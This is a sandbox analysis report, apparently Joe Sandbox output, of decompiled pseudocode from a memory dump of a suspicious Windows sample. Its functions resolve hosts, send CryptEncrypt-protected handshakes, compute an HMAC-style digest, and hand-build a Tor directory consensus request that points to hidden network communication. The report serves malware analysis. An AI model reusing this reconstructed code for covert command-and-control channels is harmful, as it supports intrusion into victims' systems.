    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 48%
    			E003999A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				void* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v52;
    				char _v252;
    				char _v452;
    				char _v852;
    				char* _t43;
    				char _t44;
    				intOrPtr _t50;
    				char _t51;
    				void* _t56;
    				void* _t57;
    				char* _t59;
    				intOrPtr _t62;
    				void* _t64;
    				void* _t85;
    				void* _t86;
    
    				_t43 =  &_v852;
    				_v20 = 0;
    				_t64 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				__imp__#115(0x202, _t43, __edi, __esi, __ebx);
    				if(_t43 != 0) {
    					L17:
    					_t44 = _v8;
    				} else {
    					_t64 = E003A1D90(0x100, 0);
    					_t86 = _t86 + 8;
    					if(_t64 != 0) {
    						_t50 = E00398730(_a4);
    						_v20 = _t50;
    						if(_t50 != 0) {
    							_t51 = _v8;
    							_t85 = 0;
    							while(1) {
    								_t69 = _v12;
    								if(_v12 != 0) {
    									E0039BB40(_t69);
    									_t51 = _v8;
    									_t86 = _t86 + 4;
    								}
    								_v12 = 0;
    								_t92 = _t51;
    								if(_t51 != 0) {
    									__imp__freeaddrinfo(_t51);
    								}
    								_v8 = 0;
    								E00399090(_t92,  &_v452, 0x22);
    								_t14 = _t85 + 0x3b32f0; // 0xb6
    								E00399090(_t92,  &_v252,  *_t14);
    								_push( &_v252);
    								_t56 = E003A0C10(_t64, 0x80,  &_v452, _v20);
    								_t86 = _t86 + 0x24;
    								if(_t56 < 0) {
    									goto L17;
    								}
    								_t57 = E00397E20(_t64, 0,  &_v12, 0xffffffff);
    								_t86 = _t86 + 0x10;
    								if(_t57 == 0) {
    									goto L17;
    								} else {
    									_v48 = 0;
    									_v44 = 0;
    									_v52 = 0;
    									_v40 = 0;
    									_v36 = 0;
    									_v32 = 0;
    									_v28 = 0;
    									_v24 = 0;
    									_t59 =  &_v8;
    									_v44 = 1;
    									_v48 = 2;
    									__imp__getaddrinfo(_v12, 0,  &_v52, _t59);
    									if(_t59 != 0) {
    										L14:
    										_t51 = _v8;
    										goto L15;
    									} else {
    										_t51 = _v8;
    										if(_t51 != 0) {
    											_t37 = _t85 + 0x3b802c; // 0x39aa10
    											_t62 =  *((intOrPtr*)( *_t37))( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x18)) + 4)));
    											_t86 = _t86 + 4;
    											_v16 = _t62;
    											__eflags = _t62;
    											if(__eflags != 0) {
    												goto L17;
    											} else {
    												goto L14;
    											}
    										} else {
    											_v16 = 0;
    											L15:
    											_t85 = _t85 + 4;
    											if(_t85 < 0x14) {
    												continue;
    											} else {
    											}
    										}
    									}
    								}
    								goto L18;
    							}
    						}
    					}
    					goto L17;
    				}
    				L18:
    				if(_t44 != 0) {
    					__imp__freeaddrinfo(_t44);
    				}
    				if(_t64 != 0) {
    					E0039BB40(_t64);
    					_t86 = _t86 + 4;
    				}
    				_t45 = _v20;
    				if(_v20 != 0) {
    					E0039BB40(_t45);
    				}
    				__imp__#116();
    				return _v16;
    			}

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003999CA
    • freeaddrinfo.WS2_32(?), ref: 00399A2B
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 00399AC6
    • freeaddrinfo.WS2_32(?), ref: 00399B0E
    • WSACleanup.WS2_32 ref: 00399B34
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 31%
    			E003A56CF(intOrPtr* __eax, void* __ecx, void* __eflags, void* _a4) {
    				void* _v8;
    				void* _v12;
    				char _v32;
    				void _v148;
    				void* __esi;
    				short _t42;
    				short _t43;
    				short _t44;
    				void* _t60;
    				void _t61;
    				intOrPtr* _t74;
    				void* _t76;
    				signed int _t77;
    				intOrPtr* _t87;
    				void* _t95;
    				void* _t97;
    				void* _t98;
    
    				_t76 = __ecx;
    				_t74 = __eax;
    				_t95 =  *0x3b8538(0x200);
    				_v8 = _t95;
    				_v12 =  *0x3b8538(0x200);
    				memset(_t95, 0, 0x1fd);
    				 *_t95 = 0x21;
    				_t42 = E003AE937(_t76);
    				_t87 = __imp__#9;
    				 *((short*)(_t74 + 0x138)) = _t42;
    				_t43 =  *_t87(_t42);
    				 *((short*)(_t95 + 3)) = _t43;
    				_t44 =  *_t87(0x14);
    				_t77 = 5;
    				 *((short*)(_t95 + 9)) = _t44;
    				_t6 = _t95 + 0xb; // 0xb
    				memcpy(_t6, _a4, _t77 << 2);
    				_t97 = _t74 + 8;
    				 *0x3b899c(_t97, _v8, 0x1fd);
    				memcpy( &_v148, _t97, 0 << 2);
    				 *0x3b8ab0( &_v148,  &_v32, 0x1d);
    				_t98 = _v12;
    				 *((intOrPtr*)(_v8 + 5)) = _v32;
    				memset(_t98, 0, 0x200);
    				if(E003A3BB7(_t74 + 0xf0, _v8, 0x1fd, _t98 + 3, _t74 + 0x110, _t74 + 0x120) == 0) {
    					L7:
    					 *0x3b8540(_v8);
    					 *0x3b8540(_t98);
    					_t60 = 0;
    				} else {
    					_t61 =  *(_t74 + 4) & 0x0000ffff;
    					__imp__#9(_t61);
    					 *_t98 = _t61;
    					 *((char*)(_t98 + 2)) = 3;
    					if(E003AFD0B( *_t74, _t98, 0x200) != 0x200) {
    						goto L7;
    					} else {
    						if(E003AFB73( *_t74, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003A3BB7(_t74 + 0x100, _v8 + 3, 0x1fd, _v12, _t74 + 0x124, _t74 + 0x134) == 0 ||  *_v12 != 0x27) {
    							_t98 = _v12;
    							goto L7;
    						} else {
    							 *0x3b8540(_v8);
    							 *0x3b8540(_v12);
    							_t60 = 1;
    						}
    					}
    				}
    				return _t60;
    			}

    APIs
    • memset.MSVCRT ref: 003A5700
    • htons.WS2_32(00000000), ref: 003A571E
    • htons.WS2_32(00000014), ref: 003A5726
    • memset.MSVCRT ref: 003A577A
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A57B1
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBB0
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBC9
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBD8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFBED
      • Part of subcall function 003AFB73: htons.WS2_32(?), ref: 003AFC25
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCA2
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCB8
      • Part of subcall function 003AFB73: memcpy.MSVCRT ref: 003AFCD6
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 22%
    			E003AEC77(void* _a4, int _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
    				void _v24;
    				void _v44;
    				void _v108;
    				void _v172;
    				char _v288;
    				void* _t46;
    				signed int _t70;
    				void* _t74;
    				void* _t82;
    				void* _t86;
    
    				memset( &_v108, 0, 0x40);
    				memset( &_v172, 0, 0x40);
    				memcpy( &_v108, _a4, _a8);
    				memcpy( &_v172, _a4, _a8);
    				_t46 = 0;
    				do {
    					 *(_t86 + _t46 - 0x68) =  *(_t86 + _t46 - 0x68) ^ 0x00000036;
    					 *(_t86 + _t46 - 0xa8) =  *(_t86 + _t46 - 0xa8) ^ 0x0000005c;
    					_t46 = _t46 + 1;
    				} while (_t46 < 0x40);
    				 *0x3b8ab4( &_v288, _t74, _t82);
    				 *0x3b899c( &_v288,  &_v108, 0x40);
    				 *0x3b899c( &_v288, _a12, _a16);
    				 *0x3b8ab0( &_v288,  &_v24);
    				_t70 = 5;
    				memcpy( &_v44,  &_v24, _t70 << 2);
    				 *0x3b8ab4( &_v288);
    				 *0x3b899c( &_v288,  &_v172, 0x40);
    				 *0x3b899c( &_v288,  &_v44, 0x14);
    				 *0x3b8ab0( &_v288,  &_v24);
    				_push(5);
    				return memcpy(_a20,  &_v24, 0 << 2);
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E00397131() {
    				struct _FILETIME _v12;
    				signed int _v16;
    				union _LARGE_INTEGER _v20;
    				signed int _t14;
    				signed int _t16;
    				signed int _t17;
    				signed int _t18;
    				signed int _t22;
    				signed int _t23;
    				signed int _t32;
    
    				_t14 =  *0x3b8100; // 0x6c988642
    				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
    				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
    				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
    					GetSystemTimeAsFileTime( &_v12);
    					_t16 = GetCurrentProcessId();
    					_t17 = GetCurrentThreadId();
    					_t18 = GetTickCount();
    					QueryPerformanceCounter( &_v20);
    					_t22 = _v16 ^ _v20.LowPart;
    					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
    					if(_t32 == 0xbb40e64e || ( *0x3b8100 & 0xffff0000) == 0) {
    						_t32 = 0xbb40e64f;
    					}
    					 *0x3b8100 = _t32;
    					 *0x3b8104 =  !_t32;
    					return _t22;
    				} else {
    					_t23 =  !_t14;
    					 *0x3b8104 = _t23;
    					return _t23;
    				}
    			}

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397168
    • GetCurrentProcessId.KERNEL32 ref: 00397174
    • GetCurrentThreadId.KERNEL32 ref: 0039717C
    • GetTickCount.KERNEL32 ref: 00397184
    • QueryPerformanceCounter.KERNEL32(?), ref: 00397190
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 97%
    			E003B0EB3(intOrPtr* __eax, void* __esi) {
    				intOrPtr* _t27;
    				intOrPtr _t32;
    				intOrPtr _t33;
    				void* _t42;
    				void* _t45;
    				void* _t47;
    				void* _t49;
    				intOrPtr _t55;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr* _t60;
    				void* _t61;
    				intOrPtr _t65;
    				intOrPtr _t67;
    				intOrPtr _t69;
    				intOrPtr _t71;
    				intOrPtr _t77;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				intOrPtr _t81;
    				void* _t82;
    				void* _t83;
    				intOrPtr _t85;
    				intOrPtr _t86;
    				intOrPtr _t87;
    				void* _t88;
    				void* _t89;
    				void* _t91;
    
    				L0:
    				while(1) {
    					L0:
    					_t83 = __esi;
    					_t27 = __eax;
    					_t59 =  *__eax;
    					if(_t59 >= 0x30 && _t59 <= 0x39) {
    						break;
    					}
    					L2:
    					_t27 = _t27 + 1;
    					if(_t27 < _t83) {
    						continue;
    					}
    					break;
    				}
    				L3:
    				_t60 = _t27;
    				if(_t27 >= _t83) {
    					L9:
    					_t61 = _t60 - _t27;
    					if(_t61 <= 6 || _t61 >= 0x10) {
    						L35:
    						_t28 =  *((intOrPtr*)(_t89 - 0x14));
    						if( *((intOrPtr*)(_t89 - 0x14)) != 0) {
    							E0039BB40(_t28);
    							_t91 = _t91 + 4;
    						}
    						_t29 =  *((intOrPtr*)(_t89 - 0x10));
    						if( *((intOrPtr*)(_t89 - 0x10)) != 0) {
    							E0039BB40(_t29);
    							_t91 = _t91 + 4;
    						}
    						_t30 =  *((intOrPtr*)(_t89 - 8));
    						if( *((intOrPtr*)(_t89 - 8)) != 0) {
    							E0039BB40(_t30);
    							_t91 = _t91 + 4;
    						}
    						_t31 =  *((intOrPtr*)(_t89 - 0xc));
    						if( *((intOrPtr*)(_t89 - 0xc)) != 0) {
    							E0039BB40(_t31);
    							_t91 = _t91 + 4;
    						}
    						_t32 =  *((intOrPtr*)(_t89 - 0x1c));
    						if(_t32 != 0) {
    							_push(_t32);
    							L00391CB0();
    						}
    						_t33 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t33 + 0xac))))(0x3b8600);
    						_t71 =  *0x3b8628; // 0x593938
    						 *0x3b8618 =  *0x3b8618 - 1;
    						 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0xc4))))(0x3b8600);
    						return  *((intOrPtr*)(_t89 - 0x18));
    					} else {
    						_t42 = E00391170(_t27, 0, _t89 - 0x14, _t61);
    						_t91 = _t91 + 0x10;
    						if(_t42 == 0) {
    							goto L35;
    						} else {
    							_t58 =  *((intOrPtr*)(_t89 + 0xc));
    							_t85 = 0;
    							while(L003994D0(_t58,  *((intOrPtr*)(_t89 - 0x14)), 0x1bb) == 0) {
    								_t55 =  *0x3b8628; // 0x593938
    								_t85 = _t85 + 1;
    								 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xc8))))(0x7530);
    								if(_t85 < 0x14) {
    									continue;
    								}
    								break;
    							}
    							if(_t85 == 0x14) {
    								goto L35;
    							}
    							_t86 = 0;
    							 *((intOrPtr*)(_t89 - 4)) = 0;
    							while(1) {
    								_t45 = E0039D890(_t86, 0,  *((intOrPtr*)(_t89 + 8)), _t58, _t89 - 4);
    								_t91 = _t91 + 0xc;
    								if(_t45 == 0) {
    									break;
    								}
    								_t69 =  *0x3b8628; // 0x593938
    								_t86 = _t86 + 1;
    								 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc8))))(0x7530);
    								if(_t86 < 0x14) {
    									continue;
    								}
    								L22:
    								if(_t86 == 0x14) {
    									goto L35;
    								}
    								_t80 =  *((intOrPtr*)(_t89 + 8));
    								_t87 = 0;
    								 *((intOrPtr*)(_t89 - 4)) = 0;
    								while(1) {
    									_t47 = E003A1B80(_t87, _t80, _t58, _t89 - 4);
    									_t91 = _t91 + 0xc;
    									if(_t47 == 0) {
    										break;
    									}
    									_t67 =  *0x3b8628; // 0x593938
    									_t87 = _t87 + 1;
    									 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0xc8))))(0x7530);
    									if(_t87 < 0x14) {
    										continue;
    									}
    									L29:
    									if(_t87 == 0x14) {
    										goto L35;
    									}
    									_t88 = 0;
    									_t82 = _t58 + 8;
    									while(1) {
    										_t49 = E00391FE0(_t58, _t82, _t88,  *((intOrPtr*)(_t89 + 8)), _t58, _t82);
    										_t91 = _t91 + 0xc;
    										if(_t49 != 0) {
    											break;
    										}
    										_t65 =  *0x3b8628; // 0x593938
    										_t88 = _t88 + 1;
    										 *((intOrPtr*)( *((intOrPtr*)(_t65 + 0xc8))))(0x7530);
    										if(_t88 < 0x64) {
    											continue;
    										}
    										break;
    									}
    									if(_t88 != 0x64) {
    										 *((intOrPtr*)(_t89 - 0x18)) = 1;
    									}
    									goto L35;
    								}
    								_t81 =  *((intOrPtr*)(_t89 - 4));
    								__eflags = _t81;
    								if(_t81 != 0) {
    									E00391380(_t81);
    									_push(_t81);
    									L00391CB0();
    									_t91 = _t91 + 4;
    								}
    								goto L29;
    							}
    							_t79 =  *((intOrPtr*)(_t89 - 4));
    							__eflags = _t79;
    							if(_t79 != 0) {
    								E00392DE0(_t79);
    								_push(_t79);
    								L00391CB0();
    								_t91 = _t91 + 4;
    							}
    							goto L22;
    						}
    					}
    				} else {
    					do {
    						_t77 =  *_t60;
    						if(_t77 < 0x30 || _t77 > 0x39) {
    							if(_t77 != 0x2e) {
    								goto L9;
    							}
    						}
    						_t60 = _t60 + 1;
    					} while (_t60 < _t83);
    					goto L9;
    				}
    			}

    APIs
      • Part of subcall function 0039D890: ??2@YAPAXI@Z.MSVCRT ref: 0039D8EA
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D929
      • Part of subcall function 0039D890: _time64.MSVCRT ref: 0039D94B
      • Part of subcall function 0039D890: ??3@YAXPAX@Z.MSVCRT ref: 0039D97B
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0F90
      • Part of subcall function 003A1B80: ??2@YAPAXI@Z.MSVCRT ref: 003A1BAF
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1BEE
      • Part of subcall function 003A1B80: _time64.MSVCRT ref: 003A1C10
      • Part of subcall function 003A1B80: ??3@YAXPAX@Z.MSVCRT ref: 003A1C3D
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0FEC
      • Part of subcall function 00391FE0: ??2@YAPAXI@Z.MSVCRT ref: 00392024
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920A1
      • Part of subcall function 00391FE0: _time64.MSVCRT ref: 003920D2
      • Part of subcall function 00391FE0: ??3@YAXPAX@Z.MSVCRT ref: 003920F9
    • ??3@YAXPAX@Z.MSVCRT ref: 003B1082
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 75%
    			E003A0ED0(intOrPtr _a4, intOrPtr _a8, void** _a12, int* _a16, intOrPtr* _a20) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				void* _v20;
    				void* _t42;
    				intOrPtr _t45;
    				intOrPtr _t55;
    				short* _t57;
    				intOrPtr _t58;
    				void* _t59;
    				void* _t60;
    				int _t62;
    				intOrPtr _t77;
    				intOrPtr _t78;
    				void* _t79;
    				signed int _t82;
    				intOrPtr* _t83;
    				void* _t84;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				void* _t88;
    
    				_t62 = 0;
    				_t77 = _a4;
    				_v8 = 0;
    				_v12 = 0;
    				_v20 = 0;
    				_v16 = 0;
    				if(_t77 != 0) {
    					_t42 = E00391170(_t77, 0,  &_v12, _a8);
    					_t87 = _t86 + 0x10;
    					if(_t42 == 0) {
    						goto L1;
    					} else {
    						_t45 = E00397B80(_v12, 0x3b3310,  &_v8, 6);
    						_t88 = _t87 + 0x10;
    						_a4 = _t45;
    						if(_t45 == 6) {
    							_t12 = _v8 + 0x10; // 0xeb000060
    							_t83 = __imp___wtoi;
    							_t62 =  *_t83( *_t12);
    							_t14 = _v8 + 0xc; // 0xc2e8cf8b
    							_t55 =  *_t83( *_t14);
    							_t88 = _t88 + 8;
    							 *_a20 = _t55;
    							if(_t62 != 0) {
    								_t17 = _v8 + 0x14; // 0x24558b23
    								_t57 =  *_t17;
    								if( *_t57 == 0xd &&  *((short*)(_t57 + 2)) == 0xa) {
    									_t84 = _t77 + 1;
    									_t79 = 0;
    									goto L8;
    									L8:
    									_t58 =  *0x3b8628; // 0x593938
    									_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc))))( *((intOrPtr*)(_t79 + _v8)));
    									_t79 = _t79 + 4;
    									_t84 = _t84 + _t59 + 1;
    									if(_t79 < 0x14) {
    										goto L8;
    									} else {
    										_t85 = _t84 + 2;
    										if( *((char*)(_t85 + _t62)) == 0xd &&  *((char*)(_t85 + _t62 + 1)) == 0xa) {
    											_t60 = E003A1D90(_t62, 0);
    											_t88 = _t88 + 8;
    											_v16 = _t60;
    											if(_t60 != 0) {
    												memcpy(_t60, _t85, _t62);
    												_t88 = _t88 + 0xc;
    												_v20 = 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						_t46 = _v12;
    						if(_v12 != 0) {
    							E0039BB40(_t46);
    							_t88 = _t88 + 4;
    						}
    						if(_v8 != 0) {
    							_t78 = _a4;
    							_t82 = 0;
    							if(_t78 > 0) {
    								do {
    									E0039BB40( *((intOrPtr*)(_v8 + _t82 * 4)));
    									_t82 = _t82 + 1;
    									_t88 = _t88 + 4;
    								} while (_t82 < _t78);
    							}
    							E0039BB40(_v8);
    						}
    						 *_a12 = _v16;
    						 *_a16 = _t62;
    						return _v20;
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • _wtoi.MSVCRT ref: 003A0F3E
    • _wtoi.MSVCRT ref: 003A0F49
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • memcpy.MSVCRT ref: 003A0FB4
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 29%
    			E003A4FF4(intOrPtr __eax) {
    				void* _t12;
    				void* _t13;
    				char* _t21;
    				void* _t24;
    				void* _t34;
    				char* _t42;
    				char* _t45;
    				void* _t47;
    				intOrPtr* _t49;
    
    				_pop(_t34);
    				 *((intOrPtr*)(_t49 + 0x20)) = __eax;
    				_t52 = __eax;
    				if(__eax == 0) {
    					L7:
    					_t12 = 0;
    				} else {
    					_t33 = _t49 + 0x20;
    					_t13 = E003A4054(_t49 + 0x20, _t52);
    					_t53 = _t13;
    					if(_t13 == 0 || E003A3EE9(_t33, _t34, _t53) == 0) {
    						L6:
    						E003AFF10( *((intOrPtr*)(_t49 + 0x20)));
    						goto L7;
    					} else {
    						 *((intOrPtr*)(_t49 + 0x14)) = 0x10;
    						__imp__#5( *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x28)))), _t49 + 0x14, _t49 + 0xc);
    						_t45 =  *0x3b8538(0x200);
    						 *_t49 = 0x400000;
    						_t21 =  *0x3b8538();
    						_t42 = _t21;
    						__imp__#12( *((intOrPtr*)(_t49 + 0x14)));
    						sprintf(_t45, "GET /tor/status-vote/current/consensus-microdesc/14C131+27B6B5+49015F+585769+805509+D586D1+E8A9C4+ED03BB+EFCBE7.z HTTP/1.0\r\nHost: %s\r\n\r\n", _t21);
    						_t24 = E003A4BDF(_t33, _t45, _t42,  *((intOrPtr*)(_t47 + 8)));
    						_t49 = _t49 + 0x1c;
    						if(_t24 == 0 || E003A4DC1(_t42) == 0) {
    							 *0x3b8540(_t42);
    							 *0x3b8540(_t45);
    							goto L6;
    						} else {
    							 *0x3b8540(_t42);
    							 *0x3b8540(_t45);
    							E003AFF10( *((intOrPtr*)(_t49 + 0x24)));
    							_t12 = 1;
    							__eflags = 1;
    						}
    					}
    				}
    				return _t12;
    			}

    APIs
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A40B3
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4122
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4165
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A41AC
      • Part of subcall function 003A4054: htonl.WS2_32(00000000), ref: 003A41C5
      • Part of subcall function 003A4054: getpeername.WS2_32(?,?,?), ref: 003A41EA
      • Part of subcall function 003A4054: memset.MSVCRT ref: 003A4226
      • Part of subcall function 003A4054: htons.WS2_32(?), ref: 003A4233
    • getpeername.WS2_32(?), ref: 003A5039
    • inet_ntoa.WS2_32(?), ref: 003A5060
    • sprintf.MSVCRT ref: 003A506D
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4C2D
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C61
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C80
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4C90
      • Part of subcall function 003A4BDF: memset.MSVCRT ref: 003A4CA5
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D4B
      • Part of subcall function 003A4BDF: strstr.MSVCRT ref: 003A4D68
      • Part of subcall function 003A4BDF: sscanf.MSVCRT ref: 003A4D70
      • Part of subcall function 003A4DC1: strtok.MSVCRT ref: 003A4E04
      • Part of subcall function 003A4DC1: strtok.MSVCRT ref: 003A4E0B
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E3F
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E60
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E76
      • Part of subcall function 003A4DC1: strstr.MSVCRT ref: 003A4E8C
